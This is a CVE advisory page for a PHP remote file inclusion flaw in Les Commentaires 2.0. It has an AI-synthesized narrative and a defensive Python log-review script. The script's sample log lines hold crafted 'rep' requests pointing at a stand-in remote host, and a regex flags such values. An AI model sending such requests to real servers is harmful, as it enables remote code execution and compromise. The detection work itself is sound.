CVE-2004-0246
Description
Les Commentaires 2.0 contains multiple PHP remote file inclusion vulnerabilities via the rep parameter in three scripts.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Les Commentaires 2.0 is prone to multiple remote file inclusion vulnerabilities in files fonctions.lib.php, derniers_commentaires.php, and admin.php. The rep parameter is not properly sanitized, allowing an attacker to specify a remote URL that is included and executed by PHP. This affects version 2.0 of the software [1].
Exploitation
An attacker can exploit this by sending a crafted HTTP request to any of the three vulnerable scripts, providing a malicious URL in the rep parameter. The attacker does not need authentication, as these scripts are accessible from the web root. The only requirement is network access to the web server hosting Les Commentaires [1].
Impact
Successful exploitation allows the attacker to execute arbitrary PHP code on the target server in the context of the web server user. This can lead to full compromise of the web application and potentially the underlying system, including data theft, defacement, or further attacks [1].
Mitigation
No official patch or fixed version is detailed in the available references. Users should upgrade to a later version if available, or remove or restrict access to the affected scripts. The advisory does not list this CVE as part of the CISA KEV [1].
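For hosts that still carry the affected scripts, a web access log review can show whether the `rep` parameter has been sent a URL instead of a local path. The following is an added example, not part of the advisory or of Les Commentaires; the combined-log line layout, the sample addresses and the host `remote.example` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script names and the parameter name are taken from the description above.
SCRIPTS = {"fonctions.lib.php", "derniers_commentaires.php", "admin.php"}
PARAM = "rep"
# Flag values that start with a URL scheme (http:, ftp:, data:, ...) or with "//".
# Two or more scheme characters are required so "C:\dir" is not flagged.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]+:|//)", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def is_remote(value):
    """True if a decoded parameter value looks like a URL, not a local path."""
    return bool(REMOTE.match(value))

def suspicious_requests(lines):
    """Return (client, script, value) for each request that needs review."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        if script not in SCRIPTS:
            continue
        # parse_qs percent-decodes once, matching what the script receives.
        values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
        bad = [v for v in values if is_remote(v)]
        if bad:
            hits.append((line.split()[0], script, bad[0]))
    return hits

# Constructed sample log lines (documentation address ranges, made-up paths).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Feb/2024:10:00:01 +0000] "GET /comments/admin.php?rep=./ HTTP/1.0" 200 512',
    '203.0.113.9 - - [10/Feb/2024:10:00:05 +0000] "GET /comments/admin.php?rep=http://remote.example/ HTTP/1.0" 200 90',
    '203.0.113.9 - - [10/Feb/2024:10:00:09 +0000] "GET /comments/derniers_commentaires.php?rep=hTTp%3A%2F%2Fremote.example%2F HTTP/1.0" 200 90',
    '198.51.100.7 - - [10/Feb/2024:10:00:12 +0000] "GET /index.php?rep=http://remote.example/ HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for client, script, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} -> {script}: rep={value!r}")
```

Access logs normally record only the query string, so a value sent in a POST body will not appear in this review.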
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- cpe:2.3:a:laurent_adda:les_commentaires:2.0:*:*:*:*:*:*:*
- (no CPE) range: = 2.0
Patches
No patches discovered yet.
References
- www.securityfocus.com/bid/9536 (nvd; Exploit, Vendor Advisory)
- marc.info (nvd)
- secunia.com/advisories/10768/ (nvd)
- exchange.xforce.ibmcloud.com/vulnerabilities/15010 (nvd)